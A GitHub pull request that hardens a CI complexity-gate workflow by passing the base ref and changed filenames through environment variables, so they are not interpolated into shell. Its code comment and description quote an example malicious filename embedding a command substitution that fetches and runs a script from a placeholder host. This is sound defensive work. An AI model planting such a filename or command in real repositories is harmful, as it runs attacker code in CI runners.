### PR TITLE
[ci] complexity-gate: pass untrusted ref/filenames via env, not shell

### DIFF
--- a/.github/workflows/complexity-gate.yml
+++ b/.github/workflows/complexity-gate.yml
@@ -44,18 +44,36 @@ jobs:
 
       - name: Get changed files
         id: changed
+        # Pass github.base_ref via env, never interpolated into the run: body.
+        # The Actions templating engine substitutes ${{ }} into the script text
+        # BEFORE bash runs it, so an untrusted value placed directly in run:
+        # would be executed as shell. Reading it from an env var is a plain
+        # variable expansion (no command substitution), which is injection-safe.
+        env:
+          BASE_REF: ${{ github.base_ref }}
         run: |
-          FILES=$(git diff --name-only origin/${{ github.base_ref }}...HEAD \
+          FILES=$(git diff --name-only "origin/${BASE_REF}...HEAD" \
             -- '*.py' '*.js' '*.ts' '*.jsx' '*.tsx' | tr '\n' ' ')
-          COUNT=$(echo $FILES | wc -w | tr -d ' ')
-          echo "files=$FILES" >> $GITHUB_OUTPUT
-          echo "count=$COUNT" >> $GITHUB_OUTPUT
+          COUNT=$(echo "$FILES" | wc -w | tr -d ' ')
+          echo "files=$FILES" >> "$GITHUB_OUTPUT"
+          echo "count=$COUNT" >> "$GITHUB_OUTPUT"
 
       - name: Run complexity analysis
         if: steps.changed.outputs.count > 0
+        # CHANGED_FILES is PR-controlled (filenames from the diff). Pass it via
+        # env, not interpolated into run:, so a filename like '$(curl evil|sh).py'
+        # cannot inject shell. Variable expansion does not evaluate command
+        # substitution in the value.
+        env:
+          CHANGED_FILES: ${{ steps.changed.outputs.files }}
         run: |
+          # Intentional unquoted word-split of the space-separated list into
+          # separate --changed-files args. This is safe: the value comes from an
+          # env var (no command substitution); disable globbing so a filename
+          # with shell metacharacters cannot expand.
+          set -f
           python .github/scripts/complexity_analysis.py \
-            --changed-files ${{ steps.changed.outputs.files }} \
+            --changed-files $CHANGED_FILES \
             --baseline-dir .baseline \
             --output-md /tmp/complexity_comment.md
 


### PR DESCRIPTION
## Summary

Audit 2026-06-14 (HIGH severity, CI hygiene). `complexity-gate.yml` interpolated `${{ github.base_ref }}` and `${{ steps.changed.outputs.files }}` directly into `run:` shell blocks.

The Actions templating engine substitutes `${{ }}` into the script **text** before bash executes it. A malicious PR that adds a file whose **name** contains shell metacharacters — e.g. `$(curl evil | sh).py` — has that name expanded into the `--changed-files` line and executed in the runner. The workflow triggers on `pull_request` (not `pull_request_target`) with a read-only token, which bounds the blast radius, but the token can still forge PR comments and read the repo: a real script-injection vector.

## Fix
Move both untrusted values into `env:` (`BASE_REF`, `CHANGED_FILES`) and reference them as shell variable expansions. Variable expansion does **not** evaluate command substitution in the value, closing the injection. `set -f` disables globbing on the intentional word-split of the space-separated file list.

Behavior is unchanged for legitimate PRs — same `files`/`count` outputs, same analysis command.

## Verify
```
python -c "import yaml; yaml.safe_load(open('.github/workflows/complexity-gate.yml'))"   # parses
grep -n 'github.base_ref\|outputs.files' .github/workflows/complexity-gate.yml            # only inside env:, never in run:
```

## Note for the merger
This PR touches `.github/workflows/`. The `gh` CLI token in use lacks the `workflow` scope, so **this must be merged via the GitHub web UI** ("Create a merge commit"), not `gh pr merge`.

## Anti-goals
- No change to triggers, permissions, or the analysis logic — purely how two values reach the shell.